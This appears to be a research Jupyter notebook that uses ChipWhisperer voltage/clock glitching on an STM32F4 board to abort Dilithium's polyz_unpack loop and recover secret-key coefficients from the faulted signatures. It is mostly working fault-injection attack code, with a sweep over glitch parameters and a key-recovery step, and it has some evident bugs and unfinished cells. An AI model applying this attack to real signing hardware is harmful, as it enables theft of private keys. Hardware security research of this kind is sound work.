# Dilithium - Glitches - Predicted

In [None]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F4'
SS_VER = 'SS_VER_2_1'

fw_path = "../../../hardware/victims/firmware/simpleserial-dilithium-ref/simpleserial-dilithium-ref-{}.hex".format(PLATFORM)

TIMEOUT_SIGN_MS = 640
TIMEOUT_SIGN_NS = TIMEOUT_SIGN_MS * 1e6

# POLY_INDEX was previously called ITER_TARGET
POLY_INDEX = 60  # e.g.: POLY_INDEX = 0 means that a fault is issued after the loop where the index is 0; thus we have 4 non-zero coefficients and 252 zero coefficients

In [None]:
import logging
logging.basicConfig(level=logging.NOTSET)
logging.getLogger('io.github.alex1s.python-dilithium').setLevel(logging.WARNING)
logging.getLogger('gurobipy.gurobipy').setLevel(logging.WARNING) # please be quiet gurobi
logging.getLogger().setLevel(logging.DEBUG + 1) # default logger should not be used anyways!
__LOGGER = logging.getLogger('sigglitches')
__LOGGER.setLevel(logging.DEBUG)
logging.getLogger("usb_ctrl").setLevel(logging.WARNING)

In [None]:
import sys
if '../../../software' not in sys.path:
    sys.path.append('../../../software')
if 'python-dilithium' not in sys.path:
    sys.path.append('python-dilithium')
if 'dilithium_solver' not in sys.path:
    sys.path.append('dilithium_solver')

In [None]:
import chipwhisperer as cw
import importlib
import json
import uuid
import threading
import numpy as np
import ipywidgets as widgets
from chipwhisperer.capture.targets import TargetIOError, TargetTimeoutError
from dilithium import Dilithium
import struct
import random
from collections import defaultdict
import time
import math
from operator import itemgetter
import functools
import pickle

In [None]:
%%bash
make -C ../../../hardware/victims/firmware/simpleserial-dilithium-ref

In [None]:
try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope()

target = cw.target(scope, cw.targets.SimpleSerial2Dilithium)
#target.baud = 230400
target.scope = scope
target.con()

time.sleep(0.05)
target.dglitch_settings()  # dilithium glitch settings

d = target.dilithium

print("INFO: Found ChipWhisperer😍")

In [None]:
# uncomment the following line to program the firmware; this takes a little while ...
# cw.program_target(scope, cw.programmers.STM32FProgrammer, fw_path)
target.reboot_flush()  # make sure the target is up and running for seamless future use

In [None]:
class Predictions:
    def __init__(self):
        self.__messages = []
        self.__signatures = []
        self.__signatures_no_fault = []
        
        def get_message_without_rejections(poly_index: int = None) -> (bytes, bytes):
            """Returns message, signature_packed"""
            if poly_index is None:
                poly_index = 1000  # this index is out of range thus it will not fault
            for i in range(2 ** 16 - 1):
                upper = i // 256
                lower = i % 256
                message = bytes([upper, lower])
                # __LOGGER.debug(f'Checking whether message {message}, faulted at polyvec_index "0" and poly_index "{poly_index}",  will sign without rejections ...')
                signature_packed, num_rejections = d.signature_faulted(message, target.secret_key, 0, poly_index)
                if num_rejections != 0:
                    message = None
                    continue
                else:
                    break
            if message is None:
                raise RuntimeException('We did not find a message without rejections searching two full bytes. While theoretically possible, it is more likely that the "signature_faulted" implementation is wrong.')
            return message, signature_packed
        
        for poly_index in range(0, d._polyz_unpack_num_iters):  # faulted at index _polyz_unpack_num_iters - 1 would mean no fault, because at that point in time all 256 coefficients already have been sampled
            message, signature = get_message_without_rejections(poly_index)
            self.__messages.append(message)
            self.__signatures.append(signature)
            self.__signatures_no_fault.append(d.signature(message, target.secret_key))
        assert len(set(self.__signatures)) == len(self.__signatures)
    
    def get_message_no_fault(self) -> bytes:
        return self.__messages[-1]
    
    def get_signature_no_fault(self) -> bytes:
        return self.__signatures[-1]

    def get_message_faulted(self, poly_index: int)  -> bytes:
        assert 0 <= poly_index < d._polyz_unpack_num_iters - 1
        return self.__messages[poly_index]
    
    def get_signature_faulted(self) -> bytes:
        assert 0 <= poly_index < d._polyz_unpack_num_iters - 1
        return self.__signatures[poly_index]
    
    def get_signature_faulted(self) -> bytes:
        assert 0 <= poly_index < d._polyz_unpack_num_iters - 1
        return self.__signatures[poly_index]
    
    def match(self, signature_packed: bytes) -> int:
        """
        Check if a signatures matches with a prediction.
        
        Returns -1 if it did not match with any prediction.
        Returns d._polyz_unpack_num_iters -1 if it matches the non-faulted prediction.
        Otherwise the return value i indicates that it matches the prediction of a fault
        after i + 1 iteration(s) / non-zero coefficient(s).
        """
        # first check if it is not faulted
        try:
            self.__signatures_no_fault.index(signature_packed)
            return d._polyz_unpack_num_iters - 1
        except ValueError:
            pass
        
        # see if it matches a expected fault pattern of any poly_index
        try:
            return self.__signatures.index(signature_packed)
        except ValueError:
            return -1
        
predictions = Predictions()
predictions

In [None]:
# these predictions are only needed when atting the loop
# poly_predictuons[i] = poly we would expect if faulted after iteration with _index_ i
target.loop()
poly_packed_no_fault = target.get_poly()
poly_no_fault = d._polyz_unpack(poly_packed_no_fault)
poly_predictions = []
for i in range(d._polyz_unpack_num_iters):
    split = (i + 1) * d._polyz_unpack_coeffs_per_iter
    poly_fault = np.concatenate((poly_no_fault[:split], np.zeros(d.n - split, dtype=np.int32)))
    assert np.shape(poly_fault) == (d.n,)
    poly_predictions.append(d._polyz_pack(poly_fault))

print(f"trig_count_loop = {target.loop_duration}; trig_count_loop_no_fault = {target.loop_duration_threshold}")
print(f'If we are running the extreme version per iteration the trigger is high for {target.loop_duration / 64} clock cycles')

In [None]:
from enum import Enum
class AttackTarget(Enum):
    POLYZ_UNPACK = 'POLYZ_UNPACK'
    SIGNATURE = 'SIGNATURE'
attack_target = AttackTarget.POLYZ_UNPACK
attack_target.value

In [None]:
from typing import Union
def analyze_poly(subject: Union[np.ndarray, bytes], reference: Union[np.ndarray, bytes]) -> (Union[int, None], Union[int, None]):
    """
    Analyze the possibly faulted poly (subject) to a non-faulted (reference) one.
    
    Returns a pair of None if subject and reference do not differ.
    Otherwise the first integer of the pair is the number of leading coefficients which are the same
    and the second integer is the number of trailing zeros of the subject.
    """
    if type(subject) == bytes:
        subject = d._polyz_unpack(subject)
    if type(reference) == bytes:
        reference = d._polyz_unpack(reference)
    
    for i in range(d.n):
        if reference[i] != subject[i]:
            num_leading_same = i
            break
    else:  # all are the same
        return d.n, 0
    
    # at least one coefficient is different
    for i in range(num_leading_same, d.n):
        subject_trail = subject[i:]
        zeros =  np.zeros(np.shape(subject_trail))
        if np.all(subject_trail == zeros):
            return num_leading_same, np.shape(zeros)[0] 
        
    return num_leading_same, 0

In [None]:
def sign_estimate_zeros(z: np.ndarray) -> int:
    np.sum(np.abs(z) <= d.beta)

def sign_get_same_and_zero(z: np.ndarray) -> int:
    estimated_zeros = sign_estimate_zeros(z)
    estimated_same = d.n - estimated_zeros
    return estimated_same, estimated_zeros

def sign_action() -> None:
    pass
    #message_int = 0
    #try:
    #    target.sign(bytes([message_int], timeout=TIMEOUT_SIGN_MS)
        
    

In [None]:
# this cell defines all the functions and constants needed for one_try
get_index = lambda num_leading_same, num_trailing_zero: num_leading_same - num_leading_same % d._polyz_unpack_coeffs_per_iter
if attack_target == AttackTarget.POLYZ_UNPACK:
    action = target.loop
    get_result_packed = target.get_poly
    trig_count_threshold = target.loop_duration_threshold
    unpack_result = d._polyz_unpack
    get_same_and_zero = lambda poly_faulted: analyze_poly(poly_faulted, poly_no_fault)
    predictions = target.signature_predictions
    get_new_zeros = lambda poly: np.array((np.sum(poly == 0),) + (0,) * (d.l - 1))
    normal_trig_count = target.loop_duration
else:
    action = functools.partial(target.sign, timeout=TIMEOUT_SIGN_MS)
    get_result_packed = target.get_sig
    trig_count_threshold = target.loop_duration_sign_threshold
    unpack_result = lambda sig_packed: d._unpack_sig(sig_packed)[1]  # return z
    get_same_and_zero = sign_get_same_and_zero
    predictions = target.signature_predictions
    get_new_zeros = lambda z: np.sum(np.abs(z) <= d.beta, axis=1)
    normal_trig_count = target.loop_duration_sign

In [None]:
# glitch_spots = [ITER_TARGET * 62 - 73]
# line above should be equivalent to ITER_TARGET * 62 + 51
# lets think about the previous line: offset of 51 can not be a proper offset to fault as an iteration takes 62 clokc cycles
# and the first one takes a few cycles longer as it has to return from the trigger_high function and setup the loop
# thus we first valid offset has to be 51 + 61 = 112;
# the forumlar we need to use right now with POLY_INDEX is thus POLY_INDEX * 62 + 51
# with POLY_INDEX in [0, 1, ..., 62]
# width_start = 6.640625

# be aware that a iteration = poly_index + 1 or iteration - 1 = poly_index

# duration is 4699 for loop, but for sign it is way lower; it is: ????
# thus a iteration is at most 4699 / 64 = 74 for loop and ???? / 64 = ?? for sign

# following params caused 128 zeros:
#      ext_offset, offset, width
#      (2322, -3.515625, 0.78125) (2322, -2.34375, 2.734375)  (2322, 0.390625, 0.390625) (2322, 0.390625, 1.5625)
# (2322, 0.390625, 1.5625) has .727272 success rate ('num_leading_same': 124, 'num_trailing_zero': 128,)
# all meaningful results I found so far had a _very_ small offset and width, at most 15 but most of the times lower than 2

ext_offset_center = normal_trig_count // 2
single_loop_iteration_duration = math.ceil(target.loop_duration / d._polyz_unpack_num_iters)
half_single_loop_iteration_duration = math.ceil(target.loop_duration / d._polyz_unpack_num_iters / 2)
ext_offset_start = ext_offset_center - half_single_loop_iteration_duration
ext_offset_stop = ext_offset_center + half_single_loop_iteration_duration
print(f"A loop takes {target.loop_duration} clock cycles, thus we will hit a branch/compare instruction if we search through at least {2 * half_single_loop_iteration_duration} ext_offsets.")


offset_start = 0
offset_stop = 20

width_start = 0
width_stop = 20

if attack_target == AttackTarget.POLYZ_UNPACK:
    RES_FNAME = f'gc.results.pickled.shortcable-allinbuttight-repeat4-cacheon-{uuid.uuid4()}.json'
    
    ext_offset_start = 0
    ext_offset_stop = single_loop_iteration_duration + 1
    
    width_start = 0
    width_stop = 49.609375
    offset_start = -44.921875
    offset_stop = 49.609375

repeat = 4  # how often to glitch (in consecutive clock cycles)
redo = 10  # with a redo of e.g. 10 we find glitches with reliability >= 10%, right?

widths = target.widths_which_include(width_start, width_stop)
offsets = target.offsets_which_include(offset_start, offset_stop)
ext_offsets = list(range(ext_offset_start, ext_offset_stop + 1))

In [None]:
# uncomment following block if you want to search from the middle to the outside

#a =  ext_offsets[:len(ext_offsets) // 2][::-1]
#b =  ext_offsets[len(ext_offsets) // 2:]
#res = [None] * len(ext_offsets)
#res[1::2] = a
#res[::2] = b
#ext_offsets = res

ext_offsets

In [None]:
offsets

In [None]:
widths

In [None]:
normal_time = len(widths) * len(offsets) * len(ext_offsets) * (redo + 1)
print(normal_time)
t = TIMEOUT_SIGN_MS * normal_time / 1000
print(f'Expected sig time: {t}s = {t/60}min = {t/3600}h')
t_all = t * 1.36 # what was that exactly again?
print(f'Expected sig + transfer time: {t_all}s = {t_all/60}min = {t_all/3600}h')

In [None]:
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["reset", "trig_cnt_high", "normal", "predicted", "zeros", "somefault"], parameters=["ext_offset", "offset", "width"])
gc.set_range("width", min(widths), max(widths))
gc.set_range("offset", min(offsets), max(offsets))
gc.set_range("ext_offset", min(ext_offsets), max(ext_offsets))
# gc.display_stats()

In [None]:
#MIN_ZEROS = d.n *  2 # double to account for false positive classifications; may still be too little for late glitches
#zeros = np.zeros(d.l)
#zero_widgets = list((widgets.IntSlider(
#    value=0,
#    min=0,
#    max=MIN_ZEROS + d.n, # most of the time we get a few more
#    step=1,
#    description=f"zeros[{i}]",
#    disabled=True,
#    continuous_update=True,
#    orientation='horizontal',
#    readout=True) for i in range(d.l)))
#print(f'We need at least {MIN_ZEROS} zeros.')
#display(*zero_widgets)

In [None]:
sigs_faulted = []
sigs_faulted_params = []

In [None]:
target.reboot_flush()

In [None]:
# just for attacking loops isolated
def one_try_new(param_tuple, recurse: bool = True) -> np.ndarray:
    """
    Try one fault parameter set.

    :param param_tuple: the parameters of the glitch (ext_offset, offset, width)
    :param action: what action is going to be glitched (polyz_unpack or signature)
    :param get_result_packed: callable 
    :returns: an upper bound on new zero coefficients
    """
    new_zeros = np.zeros(d.l)
    scope.sc.arm(False)  # reset trig_count
    scope.arm()
    try:
        action()
    except TargetIOError:  # corrupted or no response from the target; we could but do not really care to differentiate
        gc_add("reset", param_tuple)
        target.reboot_flush()
        return new_zeros
    
    trig_count = scope.adc.trig_count
    metadata = {"trig_count": trig_count}
    
    if trig_count > trig_count_threshold:  # trigger was high too long; _very_ likely no loop abort
        gc_add("trig_cnt_high", param_tuple)
        return new_zeros
    
    # if you land here, _very_ likely it was some kind of loop abort
    
    packed = get_result_packed()
    metadata["packed"] = packed
    unpacked = unpack_result(packed)
    metadata["unpacked"] = unpacked
    num_leading_same, num_trailing_zero = get_same_and_zero(unpacked)
    metadata["num_leading_same"] = num_leading_same
    metadata["num_trailing_zero"] = num_trailing_zero

    new_zeros = get_new_zeros(unpacked)
    metadata["index"] = get_index(num_leading_same, num_trailing_zero)
    
    def get_stats(group: str, do_reset: bool = False) -> None:
        if not recurse:  # avoid infinite recursion
            return
        if results_grouped[param_tuple][group] != 1:  # only get stats once per parameter set
            return
        for _ in range(100):
            one_try_new(param_tuple, recurse=False)
    
    check_next_called = False
    def check_next() -> None:
        check_next_called = True
        if not recurse:
            return
        __LOGGER.info(f"Checking next for parameters {param_tuple} ...")
        for i in range(target.loop_duration + 1):
            new_ext_offset = i
            target.scope.glitch.ext_offset = new_ext_offset
            new_params = (new_ext_offset,) + param_tuple[1:]
            for _ in range(redo + 1):
                one_try_new(new_params, recurse=False)
        target.scope.glitch.ext_offset = param_tuple[0]  # restore ext_offset, just in case ...
        __LOGGER.info(f"Done! {param_tuple} ...")
    
    prediction = predictions.get(packed)
    metadata['prediction'] = prediction
    if prediction is not None and prediction == d._polyz_unpack_num_iters - 1:
        gc_add("normal", param_tuple, metadata=metadata)
    elif prediction is not None and prediction != d._polyz_unpack_num_iters - 1:
        gc_add("perfect", param_tuple, metadata=metadata)
        get_stats("perfect")
        if not check_next_called:
            check_next()
        check_next_called = True
    elif num_trailing_zero >= d._polyz_unpack_coeffs_per_iter:
        gc_add("zeros", param_tuple, metadata=metadata)
        target.reboot_flush()  # we do not know what happened, better reset
        get_stats("zeros", do_reset=True)
        if not check_next_called:
            check_next()
        check_next_called = True
    elif prediction == d._polyz_unpack_num_iters - 1:
        gc_add("normal", param_tuple, metadata=metadata)
    else:
        gc_add("somefault", param_tuple, metadata=metadata) # we do not know what happened, better reset
        target.reboot_flush()

    return new_zeros

In [None]:
def save_results():
    with open(RES_FNAME, 'wb') as f:
        pickle.dump(gc.results, f)

In [None]:
gc_lock = threading.Lock()
def gc_add(group: str, params: tuple, metadata=None) -> None:
    with gc_lock:
        try:
            gc.add(group, params, metadata)
        except TypeError:  # will be raised if we do not "gc.display_stats"; but not a problem: still collects all data
            pass

In [None]:
save_thread_event = threading.Event()
def save_thread() -> None:
    while True:
        if save_thread_event.is_set():
            break
        with gc_lock:
            save_results()
        time.sleep(2 * 60)  # two minutes
        
thread = threading.Thread(target=save_thread)

In [None]:
thread.start()
logging.getLogger("ChipWhisperer Target").setLevel(logging.WARNING + 1)  # disable WARNING messages like "Read timed out: " or "Read timed out: Wÿ+"

start_time = time.time()
do_break = False
scope.glitch.repeat = repeat
for ext_offset in ext_offsets:
    scope.glitch.ext_offset = ext_offset
    if gc.widget_list_parameter is not None:
        gc.widget_list_parameter[gc.parameters.index("ext_offset")].value = ext_offset
    for offset in offsets:
        scope.glitch.offset = offset
        if gc.widget_list_parameter is not None:
            gc.widget_list_parameter[gc.parameters.index("offset")].value = offset
        for width in widths:
            scope.glitch.width = width
            if gc.widget_list_parameter is not None:
                gc.widget_list_parameter[gc.parameters.index("width")].value = width

            param_tuple = ext_offset, offset, width
            for _ in range(redo):
                # new_zeros = one_try(scope, target, gc, sigs_faulted, sigs_faulted_params)
                # new_zeros = one_try_loop(param_tuple, action=target.loop, get_result_packed=target.get_poly)
                new_zeros = one_try_new(param_tuple, recurse=False)
                # zeros += new_zeros
                # for i, zero_widget in enumerate(zero_widgets):
                #     zero_widget.value = zeros[i]

                # if np.all(zeros > MIN_ZEROS):
                #     do_break = True

                if do_break:
                    break
end_time = time.time()
total_duration = end_time - start_time
print(f'total duration: {total_duration}s {total_duration/60}min {total_duration/3600}h')

print("Setting event for save thread.")
save_thread_event.set()
print("Joining with save thread.")
thread.join()

In [None]:
save_results()

In [None]:
exithere

In [None]:
print("Hey")

In [None]:
sigs_faulted_unpacked = list(map(lambda sig_packed: d._unpack_sig_full(sig_packed), sigs_faulted))
from dilithium_solver.signature import Signature, calculate_c_matrix_np
from dilithium_solver.recover_s_1_entry import recover_s_1_entry
from dilithium_solver.parameters import Parameters

params = Parameters.get_nist_security_level(d.nist_security_level)

sigs = list(map(
    lambda sig_faulted: Signature(
        sig_faulted[1],
        sig_faulted[0],
        calculate_c_matrix_np(sig_faulted[0], params)
    ), sigs_faulted_unpacked))
s_1_entry_index = 0


s_1 = d._unpack_sk(sk)[4]
timeout = 10
threshold = d.beta
for i in range(len(sigs_faulted_unpacked[0][1])): # long version of saying "l"
    result = recover_s_1_entry(sigs, i, s_1, params, 142387, timeout, threshold) # this number is not relevant
    print(result)

In [2]:
scope.dis()
target.dis()

NameError: name 'scope' is not defined